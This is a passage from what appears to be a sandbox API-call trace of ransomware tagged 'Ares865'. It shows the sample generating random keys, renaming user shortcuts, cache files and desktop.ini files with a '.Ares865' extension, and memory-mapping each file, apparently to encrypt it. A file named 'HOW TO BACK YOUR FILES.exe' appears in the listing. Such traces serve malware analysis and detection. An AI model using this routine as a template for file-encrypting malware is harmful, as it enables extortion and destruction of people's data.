phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.411] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.411] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.412] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.Ares865") returned 129 [0066.412] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0066.412] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.413] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1449) returned 1 [0066.413] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.413] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.413] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.414] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b0, lpName=0x0) returned 0x118 [0066.416] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b0) returned 0x190000 [0066.416] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.417] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.417] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.418] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.Ares865") returned 128 [0066.418] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0066.419] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.419] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1228) returned 1 [0066.419] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.420] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.420] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.420] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x118 [0066.421] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x190000 [0066.422] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.423] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.423] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.424] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.Ares865") returned 132 [0066.424] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.ares865"), dwFlags=0x1) returned 1 [0066.425] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.425] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1547) returned 1 [0066.425] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.426] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.426] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.426] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x910, lpName=0x0) returned 0x118 [0066.428] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x910) returned 0x190000 [0066.428] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.429] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.429] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.433] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865") returned 115 [0066.433] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwFlags=0x1) returned 1 [0066.434] CreateFileW (lpFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.435] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260) returned 1 [0066.435] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.435] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.436] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.436] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x118 [0066.437] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0066.438] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.439] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.439] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.439] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.Ares865") returned 115 [0066.439] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.ares865"), dwFlags=0x1) returned 1 [0066.440] CreateFileW (lpFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.441] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=304) returned 1 [0066.441] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.441] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.442] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.442] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x118 [0066.451] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x190000 [0066.452] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.453] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.453] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.454] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865") returned 114 [0066.454] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwFlags=0x1) returned 1 [0066.455] CreateFileW (lpFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.455] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=552) returned 1 [0066.455] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.456] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.456] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.456] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x118 [0066.458] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0066.458] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.459] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.459] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.460] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.Ares865") returned 114 [0066.460] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.ares865"), dwFlags=0x1) returned 1 [0066.460] CreateFileW (lpFileName="C:\\Users\\Default User\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\default user\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.461] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0066.461] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0066.461] CloseHandle (hObject=0x0) returned 0 [0066.461] CloseHandle (hObject=0x12c) returned 1 [0066.461] FindNextFileW (in: hFindFile=0x2cce28, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4b2924e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4b2924e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0066.712] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Default Programs.lnk.Ares865") returned 58 [0066.712] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Default Programs.lnk" (normalized: "c:\\users\\all users\\start menu\\default programs.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Default Programs.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\default programs.lnk.ares865"), dwFlags=0x1) returned 1 [0066.713] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Default Programs.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\default programs.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.713] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1282) returned 1 [0066.714] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0066.714] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.714] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.714] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x120 [0066.716] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x190000 [0066.717] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0066.718] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.718] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.718] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\desktop.ini.Ares865") returned 49 [0066.719] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\desktop.ini" (normalized: "c:\\users\\all users\\start menu\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.719] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.719] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=442) returned 1 [0066.720] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0066.720] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.720] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.721] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c0, lpName=0x0) returned 0x120 [0066.722] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c0) returned 0x190000 [0066.722] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0066.723] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.723] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.725] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Windows Update.lnk.Ares865") returned 56 [0066.725] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Windows Update.lnk" (normalized: "c:\\users\\all users\\start menu\\windows update.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Windows Update.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\windows update.lnk.ares865"), dwFlags=0x1) returned 1 [0066.726] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Windows Update.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\windows update.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.726] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1266) returned 1 [0066.726] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0066.727] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.727] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.727] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x120 [0066.729] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0066.732] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.733] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.733] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Adobe Reader X.lnk.Ares865") returned 65 [0066.734] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\adobe reader x.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Adobe Reader X.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\adobe reader x.lnk.ares865"), dwFlags=0x1) returned 1 [0066.735] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Adobe Reader X.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\adobe reader x.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.735] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2441) returned 1 [0066.735] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.736] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.736] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.736] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc90, lpName=0x0) returned 0x118 [0066.744] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc90) returned 0x190000 [0066.749] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.751] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.751] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.751] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\desktop.ini.Ares865") returned 58 [0066.751] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.752] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, 